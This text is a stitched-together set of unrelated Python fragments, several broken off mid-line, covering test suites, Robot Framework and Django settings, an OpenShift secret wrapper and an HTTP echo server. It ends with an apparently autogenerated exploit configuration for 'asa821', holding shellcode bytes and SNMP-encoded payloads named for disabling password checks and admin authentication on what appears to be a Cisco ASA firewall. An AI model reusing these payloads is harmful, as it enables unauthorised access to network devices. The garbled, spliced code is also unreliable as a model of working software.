        return os.path.join(self.get_directory_name(), self.get_filename(filename))
|
# -*- coding: utf8 -*-
u"""
Тесты на ДЗ#5.
"""
__author__ = "wowkalucky"
__email__ = "wowkalucky@gmail.com"
__date__ = "2014-11-17"
import datetime
from hw5_solution1 import Person
def tests_for_hw5_solution1():
u"""Тесты задачи 1"""
petroff = Person("Petrov", "Petro", "1952-01-02")
ivanoff = Person("Ivanov", "Ivan", "2000-10-20")
sydoroff = Person("Sidorov", "Semen", "1980-12-31", "Senya")
assert "first_name" in dir(petroff)
assert "get_fullname" in dir(ivanoff)
ass | ert "nickname" not in dir(petroff)
assert "nickname" in dir(sydoroff)
assert petroff.surname == "Petrov"
assert petroff.first_name == "Petro"
assert petroff.get_fullname() == "Petrov Petro"
assert sydoroff.nickname == "Senya"
assert petroff.birth_dat | e == datetime.date(1952, 01, 02)
assert isinstance(petroff.birth_date, datetime.date)
assert petroff.get_age() == "62"
print 'All is Ok!' |
efault_value(self, name):
return self._cli_opts[name][1]
def _split_args_from_name_or_path(self, name):
if os.path.exists(name):
return os.path.abspath(name), []
index = self._get_arg_separator_index_from_name_or_path(name)
if index == -1:
return name, []
args = name[index+1:].split(name[index])
name = name[:index]
if os.path.exists(name):
name = os.path.abspath(name)
return name, args
def _get_arg_separator_index_from_name_or_path(self, name):
colon_index = name.find(':')
# Handle absolute Windows paths
if colon_index == 1 and name[2:3] in ('/', '\\'):
colon_index = name.find(':', colon_index+1)
semicolon_index = name.find(';')
if colon_index == -1:
return semicolon_index
if semicolon_index == -1:
return colon_index
return min(colon_index, semicolon_index)
    def _validate_remove_keywords(self, values):
        """Validate each --removekeywords value by trial-constructing a KeywordRemover."""
        for value in values:
            try:
                KeywordRemover(value)
            except DataError as err:
                raise DataError("Invalid value for option '--removekeywords'. %s" % err)
    def _validate_flatten_keywords(self, values):
        """Validate each --flattenkeywords value by trial-constructing a matcher."""
        for value in values:
            try:
                FlattenKeywordMatcher(value)
            except DataError as err:
                raise DataError("Invalid value for option '--flattenkeywords'. %s" % err)
    def __contains__(self, setting):
        """True if *setting* is a recognised option name."""
        return setting in self._cli_opts
    def __unicode__(self):
        # Human-readable dump of all parsed option values, sorted by name.
        return '\n'.join('%s: %s' % (name, self._opts[name])
                         for name in sorted(self._opts))
    # --- Convenience read-only accessors over the parsed options ---
    @property
    def output(self):
        return self['Output']
    @property
    def log(self):
        return self['Log']
    @property
    def report(self):
        return self['Report']
    @property
    def xunit(self):
        return self['XUnit']
    @property
    def split_log(self):
        return self['SplitLog']
    @property
    def status_rc(self):
        return self['StatusRC']
    @property
    def xunit_skip_noncritical(self):
        return self['XUnitSkipNonCritical']
    @property
    def statistics_config(self):
        # Keyword arguments for statistics generation.
        return {
            'suite_stat_level': self['SuiteStatLevel'],
            'tag_stat_include': self['TagStatInclude'],
            'tag_stat_exclude': self['TagStatExclude'],
            'tag_stat_combine': self['TagStatCombine'],
            'tag_stat_link': self['TagStatLink'],
            'tag_doc': self['TagDoc'],
        }
    @property
    def critical_tags(self):
        return self['Critical']
    @property
    def non_critical_tags(self):
        return self['NonCritical']
    @property
    def remove_keywords(self):
        return self['RemoveKeywords']
    @property
    def flatten_keywords(self):
        return self['FlattenKeywords']
class RobotSettings(_BaseSettings):
    """Settings used when executing tests (as opposed to RebotSettings)."""
    _extra_cli_opts = {'Output'              : ('output', 'output.xml'),
                       'LogLevel'            : ('loglevel', 'INFO'),
                       'DryRun'              : ('dryrun', False),
                       'ExitOnFailure'       : ('exitonfailure', False),
                       'ExitOnError'         : ('exitonerror', False),
                       'SkipTeardownOnExit'  : ('skipteardownonexit', False),
                       'Randomize'           : ('randomize', 'NONE'),
                       'RunEmptySuite'       : ('runemptysuite', False),
                       'WarnOnSkipped'       : ('warnonskippedfiles', False),
                       'Variables'           : ('variable', []),
                       'VariableFiles'       : ('variablefile', []),
                       'Listeners'           : ('listener', []),
                       'MonitorWidth'        : ('monitorwidth', 78),
                       'MonitorMarkers'      : ('monitormarkers', 'AUTO'),
                       'DebugFile'           : ('debugfile', None)}

    def get_rebot_settings(self):
        """Derive RebotSettings for post-processing the output of this run."""
        settings = RebotSettings()
        settings._opts.update(self._opts)
        # Execution-only options make no sense for rebot.
        for name in ['Variables', 'VariableFiles', 'Listeners']:
            # Idiom fix: `del` is a statement, not a function call.
            del settings._opts[name]
        # Filtering/renaming was already applied during execution.
        for name in ['Include', 'Exclude', 'TestNames', 'SuiteNames', 'Metadata']:
            settings._opts[name] = []
        for name in ['Name', 'Doc']:
            settings._opts[name] = None
        settings._opts['Output'] = None
        settings._opts['LogLevel'] = 'TRACE'
        settings._opts['ProcessEmptySuite'] = self['RunEmptySuite']
        return settings

    def _output_disabled(self):
        return self.output is None

    def _escape_as_data(self, value):
        return utils.escape(value)

    @property
    def suite_config(self):
        # Keyword arguments for configuring the executed suite.
        return {
            'name': self['Name'],
            'doc': self['Doc'],
            'metadata': dict(self['Metadata']),
            'set_tags': self['SetTag'],
            'include_tags': self['Include'],
            'exclude_tags': self['Exclude'],
            'include_suites': self['SuiteNames'],
            'include_tests': self['TestNames'],
            'empty_suite_ok': self['RunEmptySuite'],
            'randomize_suites': self.randomize_suites,
            'randomize_tests': self.randomize_tests,
            'randomize_seed': self.randomize_seed,
        }

    # 'Randomize' is stored as (what, seed).
    @property
    def randomize_seed(self):
        return self['Randomize'][1]

    @property
    def randomize_suites(self):
        return self['Randomize'][0] in ('suites', 'all')

    @property
    def randomize_tests(self):
        return self['Randomize'][0] in ('tests', 'all')

    @property
    def dry_run(self):
        return self['DryRun']

    @property
    def exit_on_failure(self):
        return self['ExitOnFailure']

    @property
    def exit_on_error(self):
        return self['ExitOnError']

    @property
    def skip_teardown_on_exit(self):
        return self['SkipTeardownOnExit']

    @property
    def log_level(self):
        return self['LogLevel']

    @property
    def console_logger_config(self):
        # Keyword arguments for the console logger.
        return {
            'width': self['MonitorWidth'],
            'colors': self['MonitorColors'],
            'markers': self['MonitorMarkers'],
            'stdout': self['StdOut'],
            'stderr': self['StdErr']
        }
class RebotSettings(_BaseSettings):
_extra_cli_opts = {'Output' : ('output', None),
'LogLevel' : ('loglevel', 'TRACE'),
'ProcessEmptySuite' : ('processemptysuite', False),
'StartTime' : ('starttime', None),
'EndTime' : ('endtime', None),
'Merge' : ('merge', False),
'DeprecatedMerge' : ('rerunmerge', False)}
    def _output_disabled(self):
        # Rebot always has its input XML available, so output is never disabled.
        return False
    @property
    def suite_config(self):
        """Keyword arguments for re-configuring the suite being post-processed."""
        return {
            'name': self['Name'],
            'doc': self['Doc'],
            'metadata': dict(self['Metadata']),
            'set_tags': self['SetTag'],
            'include_tags': self['Include'],
            'exclude_tags': self['Exclude'],
            'include_suites': self['SuiteNames'],
            'include_tests': self['TestNames'],
            'empty_suite_ok': self['ProcessEmptySuite'],
            'remove_keywords': self.remove_keywords,
            'log_level': self['LogLevel'],
            'critical_tags': self.critical_tags,
            'non_critical_tags': self.non_critical_tags,
            'start_time': self['StartTime'],
            'end_time': self['EndTime']
        }
    @property
    def log_config(self):
        """Configuration dict for log generation; empty when no log is produced."""
        if not self.log:
            return {}
        return {
            'title': utils.html_escape(self['LogTitle'] or ''),
            'reportURL': self._url_from_path(self.log, self.report),
            'splitLogBase': os.path.basename(os.path.splitext(self.log)[0]),
            'defaultLevel': self['VisibleLogLevel']
        }
@property
def report_config(self):
if not self.report:
return {}
return {
'title |
# -*- coding: utf-8 | -*-
from django.db import migrations
class Migration(migrations.Migratio | n):
dependencies = [
('demosite', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='homepage',
options={'verbose_name': 'homepage'},
),
]
|
a dict or an item for a list'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError as _:
entry = None
if entry == None:
return (False, self.yaml_dict)
if isinstance(entry, dict):
# pylint: disable=no-member,maybe-no-member
if entry.has_key(key_or_item):
entry.pop(key_or_item)
return (True, self.yaml_dict)
return (False, self.yaml_dict)
elif isinstance(entry, list):
# pylint: disable=no-member,maybe-no-member
ind = None
try:
ind = entry.index(key_or_item)
except ValueError:
return (False, self.yaml_dict)
entry.pop(ind)
return (True, self.yaml_dict)
return (False, self.yaml_dict)
def delete(self, path):
''' remove path from a dict'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError as _:
entry = None
if entry == None:
return (False, self.yaml_dict)
result = Yedit.remove_entry(self.yaml_dict, path, self.separator)
if not result:
return (False, self.yaml_dict)
return (True, self.yaml_dict)
    def exists(self, path, value):
        ''' check if value exists at path'''
        try:
            entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
        except KeyError as _:
            entry = None
        if isinstance(entry, list):
            # List entry: simple membership test.
            if value in entry:
                return True
            return False
        elif isinstance(entry, dict):
            if isinstance(value, dict):
                # Subset check: every key/value pair of `value` must match.
                # NOTE(review): raises KeyError if `value` has a key missing
                # from `entry`, and an empty `value` dict returns False --
                # confirm these are the intended semantics.
                rval = False
                for key, val in value.items():
                    if entry[key] != val:
                        rval = False
                        break
                    else:
                        rval = True
                return rval
            # Scalar against a dict: membership over the dict's keys.
            return value in entry
        return entry == value
def append(self, path, value):
'''append value to a list'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError as _:
entry = None
if entry is None:
self.put(path, [])
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
if not isinstance(entry, list):
return (False, self.yaml_dict)
# pylint: disable=no-member,maybe-no-member
entry.append(value)
return (True, self.yaml_dict)
# pylint: disable=too-many-arguments
def update(self, path, value, index=None, curr_value=None):
''' put path, value into a d | ict '''
try:
entry = Yedit.get_entry(self. | yaml_dict, path, self.separator)
except KeyError as _:
entry = None
if isinstance(entry, dict):
# pylint: disable=no-member,maybe-no-member
if not isinstance(value, dict):
raise YeditException('Cannot replace key, value entry in dict with non-dict type.' \
' value=[%s] [%s]' % (value, type(value)))
entry.update(value)
return (True, self.yaml_dict)
elif isinstance(entry, list):
# pylint: disable=no-member,maybe-no-member
ind = None
if curr_value:
try:
ind = entry.index(curr_value)
except ValueError:
return (False, self.yaml_dict)
elif index != None:
ind = index
if ind != None and entry[ind] != value:
entry[ind] = value
return (True, self.yaml_dict)
# see if it exists in the list
try:
ind = entry.index(value)
except ValueError:
# doesn't exist, append it
entry.append(value)
return (True, self.yaml_dict)
#already exists, return
if ind != None:
return (False, self.yaml_dict)
return (False, self.yaml_dict)
    def put(self, path, value):
        ''' put path, value into a dict '''
        try:
            entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
        except KeyError as _:
            entry = None
        # No-op when the value is already in place.
        if entry == value:
            return (False, self.yaml_dict)
        # deepcopy didn't work
        # Round-trip through ruamel to clone the document so a failed
        # add_entry leaves self.yaml_dict untouched.
        tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict, default_flow_style=False), yaml.RoundTripLoader)
        # pylint: disable=no-member
        # Preserve block-style formatting on the clone.
        if hasattr(self.yaml_dict, 'fa'):
            tmp_copy.fa.set_block_style()
        result = Yedit.add_entry(tmp_copy, path, value, self.separator)
        if not result:
            return (False, self.yaml_dict)
        # Commit the modified clone only on success.
        self.yaml_dict = tmp_copy
        return (True, self.yaml_dict)
def create(self, path, value):
''' create a yaml file '''
if not self.file_exists():
# deepcopy didn't work
tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict, default_flow_style=False), yaml.RoundTripLoader)
# pylint: disable=no-member
if hasattr(self.yaml_dict, 'fa'):
tmp_copy.fa.set_block_style()
result = Yedit.add_entry(tmp_copy, path, value, self.separator)
if result:
self.yaml_dict = tmp_copy
return (True, self.yaml_dict)
return (False, self.yaml_dict)
import base64
# pylint: disable=too-many-arguments
class Secret(OpenShiftCLI):
''' Class to wrap the oc command line tools
'''
def __init__(self,
namespace,
secret_name=None,
decode=False,
kubeconfig='/etc/origin/master/admin.kubeconfig',
verbose=False):
''' Constructor for OpenshiftOC '''
super(Secret, self).__init__(namespace, kubeconfig)
self.namespace = namespace
self.name = secret_name
self.kubeconfig = kubeconfig
self.decode = decode
self.verbose = verbose
def get(self):
'''return a secret by name '''
results = self._get('secrets', self.name)
results['decoded'] = {}
results['exists'] = False
if results['returncode'] == 0 and results['results'][0]:
results['exists'] = True
if self.decode:
if results['results'][0].has_key('data'):
for sname, value in results['results'][0]['data'].items():
results['decoded'][sname] = base64.decodestring(value)
if results['returncode'] != 0 and '"%s" not found' % self.name in results['stderr']:
results['returncode'] = 0
return results
def delete(self):
'''delete a secret by name'''
return self._delete('secrets', self.name)
def create(self, files=None, contents=None, content_type=None):
'''Create a secret '''
if not files:
files = Utils.create_files_from_contents(contents, content_type=content_type)
secrets = ["%s=%s" % (sfile['name'], sfile['path']) for sfile in files]
cmd = ['-n%s' % self.namespace, 'secrets', 'new', self.name]
cmd.extend(secrets)
return self.openshift_cmd(cmd)
def update(self, files, force=False):
'''run update secret
This receives a list of file names and converts it into a secret.
The secret is then written to disk and passed into the `oc replace` command.
'''
secret = self.prep_secret(files)
if secret['returncode'] != 0:
return secret
sfile_path = '/tmp/%s' % self.name
with open(sfile_path, 'w') as sfd:
sfd.write(json.dumps(secret['results']))
atexit.register(Utils.cleanup, [sfile_path])
return self._replace(sfile_path, force=force)
def prep_secret(self, files=None, contents=None):
''' return what the secret would look like if |
# -*- coding: utf-8 -*-
#
# This file is part of CERN Analysis Preservation Framework.
# Copyright (C) 2017 CERN.
#
# CERN Analysis Preservation Framework is free software; you can redistribute
# it and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# CERN Analysis Preservation Framework is distributed in the hope that it will
# be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with CERN Analysis Preservation Framework; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Integration tests for deleting deposits."""
import json
# #######################################
# # api/deposits/{pid} [DELETE]
# #######################################
def test_delete_deposit_with_non_existing_pid_returns_404(app,
                                                          auth_headers_for_superuser):
    """DELETE on an unknown pid must answer 404."""
    with app.test_client() as client:
        res = client.delete('/deposits/{}'.format('non-existing-pid'),
                            headers=auth_headers_for_superuser)
        assert res.status_code == 404
def test_delete_deposit_when_user_has_no_permission_returns_403(app,
                                                                users,
                                                                create_deposit,
                                                                auth_headers_for_user):
    """A user with no permission on the deposit gets 403 on DELETE."""
    deposit = create_deposit(users['lhcb_user'], 'lhcb-v0.0.1')
    pid = deposit['_deposit']['id']
    headers = auth_headers_for_user(users['lhcb_user2'])
    with app.test_client() as client:
        res = client.delete('/deposits/{}'.format(pid), headers=headers)
        assert res.status_code == 403
def test_delete_deposit_when_user_is_owner_can_delete_his_deposit(app,
                                                                  users,
                                                                  create_deposit,
                                                                  json_headers,
                                                                  auth_headers_for_user):
    """The owner can delete his own deposit; afterwards it is gone (410)."""
    owner = users['lhcb_user']
    deposit = create_deposit(owner, 'lhcb-v0.0.1')
    pid = deposit['_deposit']['id']
    headers = auth_headers_for_user(owner) + json_headers
    with app.test_client() as client:
        res = client.delete('/deposits/{}'.format(pid), headers=headers)
        assert res.status_code == 204
        # deposit not existing anymore
        res = client.get('/deposits/{}'.format(pid), headers=headers)
        assert res.status_code == 410
def test_delete_deposit_when_deposit_published_already_cant_be_deleted(app,
                                                                       users,
                                                                       create_deposit,
                                                                       json_headers,
                                                                       auth_headers_for_user):
    """Published deposits cannot be deleted (403) and stay accessible."""
    deposit = create_deposit(users['lhcb_user'], 'lhcb-v0.0.1')
    headers = auth_headers_for_user(users['lhcb_user']) + json_headers
    pid = deposit['_deposit']['id']
    with app.test_client() as client:
        client.post('/deposits/{}/actions/publish'.format(pid),
                    headers=headers)
        res = client.delete('/deposits/{}'.format(pid), headers=headers)
        assert res.status_code == 403
        # deposit not removed
        res = client.get('/deposits/{}'.format(pid), headers=headers)
        assert res.status_code == 200
def test_delete_deposit_when_superuser_can_delete_others_deposit(app,
                                                                 users,
                                                                 create_deposit,
                                                                 auth_headers_for_superuser):
    """A superuser may delete a deposit owned by another user."""
    deposit = create_deposit(users['lhcb_user'], 'lhcb-v0.0.1')
    pid = deposit['_deposit']['id']
    with app.test_client() as client:
        res = client.delete('/deposits/{}'.format(pid),
                            headers=auth_headers_for_superuser)
        assert res.status_code == 204
def test_delete_deposit_when_user_with_admin_access_can_delete(app,
                                                               users,
                                                               create_deposit,
                                                               auth_headers_for_user,
                                                               json_headers):
    """A user granted deposit-admin on a deposit may delete it."""
    owner, other_user = users['lhcb_user'], users['cms_user']
    deposit = create_deposit(owner, 'lhcb-v0.0.1')
    pid = deposit['_deposit']['id']
    permissions = [{
        'email': other_user.email,
        'type': 'user',
        'op': 'add',
        'action': 'deposit-admin'
    }]
    with app.test_client() as client:
        # grant the other user admin access
        client.post('/deposits/{}/actions/permissions'.format(pid),
                    headers=auth_headers_for_user(owner) + json_headers,
                    data=json.dumps(permissions))
        res = client.delete('/deposits/{}'.format(pid),
                            headers=auth_headers_for_user(other_user))
        assert res.status_code == 204
def test_delete_deposit_when_user_only_with_read_write_access_returns_403(app,
                                                                          users,
                                                                          create_deposit,
                                                                          auth_headers_for_user,
                                                                          json_headers):
    """read + update permissions are not enough to delete: expect 403."""
    owner, other_user = users['lhcb_user'], users['cms_user']
    deposit = create_deposit(owner, 'lhcb-v0.0.1')
    pid = deposit['_deposit']['id']
    permissions = [
        {
            'email': other_user.email,
            'type': 'user',
            'op': 'add',
            'action': 'deposit-read'
        },
        {
            'email': other_user.email,
            'type': 'user',
            'op': 'add',
            'action': 'deposit-update'
        },
    ]
    with app.test_client() as client:
        # give other user read/write access
        client.post('/deposits/{}/actions/permissions'.format(pid),
                    headers=auth_headers_for_user(owner) + json_headers,
                    data=json.dumps(permissions))
        res = client.delete('/deposits/{}'.format(pid),
                            headers=auth_headers_for_user(other_user))
        assert res.status_code == 403
|
#!/usr/bin/env python
# Reflects the requests from HTTP methods GET, POST, PUT, and DELETE
# Written by Nathan Hamiel (2010)
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from optparse import OptionParser
class RequestHandler(BaseHTTPRequestHandler):
    """Echo incoming requests to stdout and answer 200 to every method."""
    # Counters kept for the commented-out success-rate experiment below.
    success = 0
    total = 0

    def do_GET(self):
        """Log a GET request and reply 200 with a test cookie."""
        request_path = self.path
        print("\n----- Request Start ----->\n")
        print(request_path)
        print(self.headers)
        print("<----- Request End -----\n")
        self.send_response(200)
        self.send_header("Set-Cookie", "foo=bar")
        # Fix: without end_headers() the header section is never terminated,
        # so clients keep waiting for the response body.
        self.end_headers()

    def do_POST(self):
        """Log a POST request (headers and body) and reply 200."""
        request_path = self.path
        print("\n----- Request Start ----->\n")
        # print(request_path)
        request_headers = self.headers
        content_length = request_headers.getheaders('content-length')
        length = int(content_length[0]) if content_length else 0
        # print(request_headers)
        print(self.rfile.read(length))
        """
        r = self.rfile.read(length).split('=')[-1]
        print r
        if r == 'true':
            success += 1
        total +=1
        else:
            total +=1
        print success
        print total
        print''
        """
        print("<----- Request End -----\n")
        self.send_response(200)
        # Fix: terminate the header section (see do_GET).
        self.end_headers()

    do_PUT = do_POST
    do_DELETE = do_GET
def main():
    """Run the echo server on localhost:8080 until interrupted."""
    port = 8080
    print('Listening on localhost:%s' % port)
    HTTPServer(('', port), RequestHandler).serve_forever()
if __name__ == "__main__":
    # Args are parsed only so that --help prints the usage text below;
    # the parsed options/args are intentionally unused by main().
    parser = OptionParser()
    parser.usage = ("Creates an http-server that will echo out any GET or POST parameters\n"
                    "Run:\n\n"
                    "   reflect")
    (options, args) = parser.parse_args()
    main()
|
"""
This module houses ctypes interfaces for GDAL objects. The following GDAL
objects are supported:
CoordTransform: Used for coordinate transformations from one spatial
reference system to another.
Driver: Wraps an OGR data source driver.
DataSource: Wrapper for the OGR data source object, supports
OGR-supported data sources.
Envelope: A ctypes structure for bounding boxes (GDAL library
not required).
OGRGeometry: Object for accessing OGR Geometry functionality.
OGRGeomType: A class for representing the different OGR Geometry
types (GDAL library not required).
SpatialReference: Represents OSR Spatial Reference objects.
The GDAL library will be imported from the system path using the default
library name for the current OS. The default library path may be overridden
by setting `GDAL_LIBRARY_PATH` in your settings with the path to the GDAL C
library on your system.
 GDAL links to a large number of external libraries that consume RAM when
 loaded.  Thus, it may be desirable to disable GDAL on systems with limited
 RAM resources -- this may be accomplished by setting `GDAL_LIBRARY_PATH`
 to a non-existent file location (e.g., `GDAL_LIBRARY_PATH='/null/path'`;
 setting to None/False/'' will not work as a string must be given).
"""
# Attempting to import objects that depend on the GDAL library.  The
# HAS_GDAL flag will be set to True if the library is present on
# the system.
try:
    from django.contrib.gis.gdal.driver import Driver
    from django.contrib.gis.gdal.datasource import DataSource
    from django.contrib.gis.gdal.libgdal import gdal_version, gdal_full_version, gdal_release_date, GEOJSON, GDAL_VERSION
    from django.contrib.gis.gdal.srs import SpatialReference, CoordTransform
    from django.contrib.gis.gdal.geometries import OGRGeometry
    HAS_GDAL = True
except Exception:
    # A bare `except:` would also trap SystemExit/KeyboardInterrupt.
    # Exception still covers both ImportError and the errors raised when
    # the GDAL shared library cannot be loaded.
    HAS_GDAL, GEOJSON = False, False

try:
    from django.contrib.gis.gdal.envelope import Envelope
except ImportError:
    # No ctypes, but don't raise an exception.
    pass

from django.contrib.gis.gdal.error import check_err, OGRException, OGRIndexError, SRSException
from django.contrib.gis.gdal.geomtype import OGRGeomType
|
from pycp2k.inputsection import InputSection
from ._each406 import _eac | h406
class _restart14(InputSection):
    """Autogenerated CP2K input section for the RESTART print key."""

    def __init__(self):
        InputSection.__init__(self)
        self._name = "RESTART"
        self.Section_parameters = None
        self.Add_last = None
        self.Common_iteration_levels = None
        self.Filename = None
        self.Log_print_key = None
        self.EACH = _each406()
        self._keywords = {
            'Add_last': 'ADD_LAST',
            'Common_iteration_levels': 'COMMON_ITERATION_LEVELS',
            'Filename': 'FILENAME',
            'Log_print_key': 'LOG_PRINT_KEY',
        }
        self._subsections = {'EACH': 'EACH'}
        self._attributes = ['Section_parameters']
|
def resizeApp(app, dx, dy):
    """Bring `app` to the front and drag its resize grip by (dx, dy) pixels."""
    switchApp(app)
    grip = find(Pattern("1273159241516.png").targetOffset(3, 14))
    target = grip.getCenter().offset(dx, dy)
    dragDrop(grip, target)
# Demo invocation: grow the Safari window by 50x50 pixels.
resizeApp("Safari", 50, 50)
# Leftover experiments kept for reference:
# exists("1273159241516.png")
# click(Pattern("1273159241516.png").targetOffset(3,14).similar(0.7).firstN(2))
# with Region(10,100,300,300):
# pass
# click("__SIKULI-CAPTURE-BUTTON__")
| |
"""
WSGI config for geology project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``ru | nfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` | setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
from os.path import abspath, dirname
from sys import path
# Make project modules importable; must happen before the settings module
# (and therefore the Django application) is loaded.
SITE_ROOT = dirname(dirname(abspath(__file__)))
path.append(SITE_ROOT)
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "jajaja.settings"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "geology.settings.production")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
# NOTE: imported here (not at the top) so DJANGO_SETTINGS_MODULE is set first.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
|
#
# this file autogenerated, do not touch
#
vers = "asa821"
my_ret_addr_len = 4
my_ret_addr_byte = "\x93\xf2\x2b\x09"
my_ret_addr_snmp = "147.242.43.9"
finder_len = 9
finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90"
finder_snmp = "139.124.36.20.139.7.255.224.144"
preamble_len = 41
preamble_byte = "\xb8\xc9\x3f\x10\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60"
preamble_snmp = "184.201.63.16.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96"
postscript_len = 2
postscript_byte = "\x61\xc3"
postscript_snmp = "97.195"
successmsg_len = 19
successmsg_byte = "\xb8\x0a\xd4\x7c\x09\x50\xb8\xc5\xed\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58"
successmsg_snmp = "184.10.212.124.9.80.184.197.237.163.173.53.165.165.165.165.255.208.88"
launcher_len = 11
launcher_byte = "\x8b\x84\x24\xd8\x01\x00\x00\x04\x01\xff\xd0"
launcher_snmp = "139.132.36.216.1.0.0.4.1.255.208"
payload_nop_len = 116
payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x0a\xd4\x7c\x09\x50\xb8\xc5\xed\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3"
payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.10.212.124.9.80.184.197.237.163.173.53.165.165.165.165.255.208.88.195"
payload_PMCHECK_DISABLE_len = 66
payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xa5\x81\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xf0\x0e\x24\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3"
payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.165.129.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.240.14.36.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195"
payload_PMCHECK_ENABLE_len = 66
payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\xf0\x0e\x24\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xa5\x81\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80"
payload_PMCHECK_ENABLE_snmp = "235.20.191.240.14.36.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.165.129.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128"
payload_AAAADMINAUTH_DISABLE_len = 66
payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x75\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x10\xd7\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3"
payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.117.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.16.215.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195"
payload_AAAADMINAUTH_ENABLE_len = 66
